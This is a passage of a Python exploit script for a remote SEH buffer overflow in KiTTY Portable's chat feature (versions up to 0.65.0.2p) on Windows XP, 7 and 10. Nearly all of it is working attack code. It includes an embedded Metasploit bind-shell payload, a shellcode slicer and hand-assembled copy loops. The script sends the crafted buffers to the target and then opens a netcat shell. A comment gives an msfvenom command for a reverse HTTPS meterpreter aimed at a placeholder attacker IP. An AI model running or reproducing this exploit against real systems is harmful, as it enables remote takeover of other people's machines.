[*] Connecting to our shell...
(UNKNOWN) [10.0.0.52] 4444 (?) open
Microsoft Windows [version 10.0.10240]
(c) 2015 Microsoft Corporation. Tous droits reserves.
C:\kitty\App\KiTTY>
"""
import socket, os, time, sys, struct
print "\nKiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)"
if len(sys.argv) < 3:
print "\nUsage: kitty_chat.py <IP> <winxp|win7|win10> [no_nc|local_nc]"
print "Example: kitty_chat.py 192.168.135.130 win7"
print "\n Optional argument:"
print "- 'no_nc' (no netcat), prevents the exploit from starting netcat."
print "Useful if you are using your own shellcode."
print "- 'local_nc (local netcat), binds netcat on local port 4444."
print "Useful if you are using a classic reverse shell shellcode."
sys.exit()
host = sys.argv[1] # Remote target
win = sys.argv[2] # OS
# If argument "no_nc" specified, do not start netcat at the end of the exploit
# If argument "local_nc" specified, bind netcat to local port 4444
# By default netcat will connect to remote host on port 4444 (default shellcode is a bind shell)
netcat = "remote"
if len(sys.argv) == 4:
if sys.argv[3] == "no_nc":
netcat = "disabled"
elif sys.argv[3] == "local_nc":
netcat = "local"
else:
print "Unknown argument: %s" % sys.argv[3]
sys.exit()
# Destination address, will be used to calculate dst addr copy from ECX + 0x0006EEC6
relative_jump = 0x112910E8 # = 0x0006EEC6 + 0x11222222 ; avoid NULLs
slice_size = 118
# OS buffer alignement
# buffer length written to memory at time of crash
if win == "win7":
offset = 180
elif win == "win10":
offset = 196
elif win == "winxp":
offset = 160
slice_size = 98 # buffer smaller on XP, slice size must be reduced
else:
print "Unknown OS selected: %s" % win
print "Please choose 'winxp', 'win7' or 'win10'"
sys.exit()
# Shellcode choice: below is a Metasploit bind shell of 350 bytes. However I have tested successfully
# a Metasploit meterpreter reverse RC4 shell of 850 bytes (encoded with x86/alpha_mixed) on Windows XP where the buffer
# is the smallest. The shellcode was cut into 9 slices and worked perfectly :-) The same works of course
# for Windows 7 and Windows 10, where I tested successfully a Metasploit HTTPS reverse shell of 1178 bytes
# (encoded with x86/alpha_mixed), which was cut into 10 slices. To generate such shellcode:
# msfvenom -p windows/meterpreter/reverse_https LHOST=YOUR_ATTACKER_IP LPORT=4444 -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' -f c
# Metasploit Bind Shell 4444
# Encoder: x86/fnstenv_mov
# Bad chars: '\x00\x0a\x0d\xff'
# Size: 350 bytes
shellcode = (
"\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e\xf9"
"\xa7\x68\x83\xeb\xfc\xe2\xf4\xf2\x11\x25\x68\x0e\xf9\xc7\xe1"
"\xeb\xc8\x67\x0c\x85\xa9\x97\xe3\x5c\xf5\x2c\x3a\x1a\x72\xd5"
"\x40\x01\x4e\xed\x4e\x3f\x06\x0b\x54\x6f\x85\xa5\x44\x2e\x38"
"\x68\x65\x0f\x3e\x45\x9a\x5c\xae\x2c\x3a\x1e\x72\xed\x54\x85"
"\xb5\xb6\x10\xed\xb1\xa6\xb9\x5f\x72\xfe\x48\x0f\x2a\x2c\x21"
"\x16\x1a\x9d\x21\x85\xcd\x2c\x69\xd8\xc8\x58\xc4\xcf\x36\xaa"
"\x69\xc9\xc1\x47\x1d\xf8\xfa\xda\x90\x35\x84\x83\x1d\xea\xa1"
"\x2c\x30\x2a\xf8\x74\x0e\x85\xf5\xec\xe3\x56\xe5\xa6\xbb\x85"
"\xfd\x2c\x69\xde\x70\xe3\x4c\x2a\xa2\xfc\x09\x57\xa3\xf6\x97"
"\xee\xa6\xf8\x32\x85\xeb\x4c\xe5\x53\x91\x94\x5a\x0e\xf9\xcf"
"\x1f\x7d\xcb\xf8\x3c\x66\xb5\xd0\x4e\x09\x06\x72\xd0\x9e\xf8"
"\xa7\x68\x27\x3d\xf3\x38\x66\xd0\x27\x03\x0e\x06\x72\x02\x06"
"\xa0\xf7\x8a\xf3\xb9\xf7\x28\x5e\x91\x4d\x67\xd1\x19\x58\xbd"
"\x99\x91\xa5\x68\x1f\xa5\x2e\x8e\x64\xe9\xf1\x3f\x66\x3b\x7c"
"\x5f\x69\x06\x72\x3f\x66\x4e\x4e\x50\xf1\x06\x72\x3f\x66\x8d"
"\x4b\x53\xef\x06\x72\x3f\x99\x91\xd2\x06\x43\x98\x58\xbd\x66"
"\x9a\xca\x0c\x0e\x70\x44\x3f\x59\xae\x96\x9e\x64\xeb\xfe\x3e"
"\xec\x04\xc1\xaf\x4a\xdd\x9b\x69\x0f\x74\xe3\x4c\x1e\x3f\xa7"
"\x2c\x5a\xa9\xf1\x3e\x58\xbf\xf1\x26\x58\xaf\xf4\x3e\x66\x80"
"\x6b\x57\x88\x06\x72\xe1\xee\xb7\xf1\x2e\xf1\xc9\xcf\x60\x89"
"\xe4\xc7\x97\xdb\x42\x57\xdd\xac\xaf\xcf\xce\x9b\x44\x3a\x97"
"\xdb\xc5\xa1\x14\x04\x79\x5c\x88\x7b\xfc\x1c\x2f\x1d\x8b\xc8"
"\x02\x0e\xaa\x58\xbd"
)
# ###############################################################################
# ** Shellcode Slicer **
# ###############################################################################
# Slice our shellcode in as many parts as necessary
count = 1
position = 0
remaining = len(shellcode)
slice = []
total_size = 0
counter = 0
while position < len(shellcode):
if remaining > (slice_size - 1):
slice.append(shellcode[position:slice_size*count])
position = slice_size * count
remaining = len(shellcode) - position
count += 1
else: # last slice
slice.append(shellcode[position:position+remaining] + '\x90' * (slice_size - remaining))
position = len(shellcode)
remaining = 0
# If shellcode size is less than 256 bytes (\xFF), two slices only are required. However the jump
# to shellcode being on 2 bytes, it would insert a NULL (e.g \xFE\x00). In this case we simply
# add a NOP slice to keep this shellcode slicer generic.
if len(shellcode) < 256:
slice.append('\x90' * slice_size)
total_size += slice_size
# Keep track of whole slices size, which may be greater than original shellcode size
# if padding is needed for the last slice. Will be used to calculate a jump size later
total_size += len(slice[counter])
# ###############################################################################
# ** Buffer Builder **
# ###############################################################################
# Prepare as many buffers as we have shellcode slices
seh = '\x36\x31\x4B\x00' # 0x004B3136 / POP POP RET / kitty_portable.exe 0.65.0.2p
#seh = '\x43\x82\x4B\x00' # 0x004B8243 / POP POP RET / kitty_portable.exe 0.63.2.2p
#seh = '\x0B\x34\x49\x00' # 0x0049340B / POP POP RET / kitty_portable.exe 0.62.1.2p
nseh = '\x90' * 4 # will be calculated later
junk = '\x41' * 58
endmark = '\x43' * 5 # used to mark end of slice
buffer = []
for index in range(len(slice)):
# Slice end marker, to stop copy once reached # mov edi,0x4343XXXX
shellcode_end = '\xBF' + slice[index][slice_size-2:slice_size] + '\x43\x43'
shell_copy = ( # 51 bytes
# Calculate shellcode src & dst address
'\x8B\x5C\x24\x08' # mov ebx,[esp+8] ; retrieve nseh address
)
if index < (len(slice) - 1):
# sub bl,0xB2 ; calculate shellcode position from nseh
shell_copy += '\x80\xEB' + struct.pack("<B", slice_size + len(endmark) + 51 + len(nseh))
else: # last slice
# sub bl,0xB1 ; calculate shellcode position from nseh
shell_copy += '\x80\xEB' + struct.pack("<B", slice_size + len(endmark) + 50 + len(nseh))
# In this exploit we retrieve an address from the main process memory, using ECX. This will be used below to calculate
# shellcode destination. On other exploits, it may be necessary to use another register (or even to hardcode the address)
shell_copy += (
'\x89\xCE' # mov esi,ecx ; retrieve main process memory address
'\x31\xC9' # xor ecx,ecx ; will store the increment
)
# Calculate shellcode destination relative to memory address retrieved above. As we ADD an address having NULLs
# we store a non NULL address instead, that we SUB afterwards in the register itself
if index > 0: # add esi,0x1117FED7 (+118 * x)
shell_copy += '\x81\xC6' + struct.pack("<I", relative_jump + (slice_size * index))
else: # first slice
shell_copy += '\x81\xC6' + struct.pack("<I", relative_jump)
shell_copy += (
'\x81\xEE\x22\x22\x22\x11' # sub esi,0x11222222 ; calculate shellcode destination
)
shell_copy += shellcode_end # mov edi,0x4343XXXX ; shellcode end mark
shell_copy += (
# Shellcode copy loop
'\x83\xC1\x04' # add ecx, 0x4 ; increment counter
'\x83\xC6\x04' # add esi, 0x4 ; increment destination
'\x8B\x14\x0B' # mov edx,[ebx+ecx] ; put shell chunk into edx
'\x89\x16' # mov [esi],edx ; copy shell chunk to destination
'\x39\xFA' # cmp edx,edi ; check if we reached shellcode end mark (if yes set ZF = 1)
'\x75\xF1' # jne short -13 ; if ZF = 0, jump back to increment ecx
)
if index < (len(slice) - 1):
shell_copy += ( # infinite loop
'\x90\x90\x90\x90' # nop nop nop nop ; infinite loop
'\xEB\xFA\x90\x90' # jmp short -0x4 ; infinite loop
)
else: # last slice
# sub si,0x160 ; prepare jump address: sub len(slices)
shell_copy += '\x66\x81\xEE' + struct.pack("<H", total_size - 2)
shell_copy += (
'\x56' # push esi ; store full shellcode address on stack
'\xC3' # ret ; jump to shellcode (we cannot us JMP or CALL as \xFF is a bad char)
)
# jmp short -len(shell_copy)
nseh = '\xEB' + struct.pack("<B", 254 - len(shell_copy)) + '\x90\x90'
padding = '\x42' * (offset - len(slice[index]) - len(endmark) - len(shell_copy))
buffer.append(junk + padding + slice[index] + endmark + shell_copy + nseh + seh)
# ###############################################################################
# ** Slice Launcher **
# ###############################################################################
# Send all of our buffers to the target!
sock = []
print "[*] Connecting to %s" % host
for index in range(len(buffer)):
sock.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
sock[index].connect((host, 1987))
time.sleep(1)
print "[*] Sending evil buffer%d... (slice %d/%d)" % (index+1, index+1, len(buffer))
sock[index].send(buffer[index])
time.sleep(1)
sock[index].close()
time.sleep(2)
if index == (len(buffer) - 1):
if netcat == "disabled":
print "[*] Done."
elif netcat == "local":
print "\n[*] Waiting for our shell!"
os.system("nc -nlvp 4444")
elif netcat == "remote": # default
print "\n[*] Connecting to our shell..."
time.sleep(2)
os.system("nc -nv " + host + " 4444")
except:
print "[-] Error sending buffer"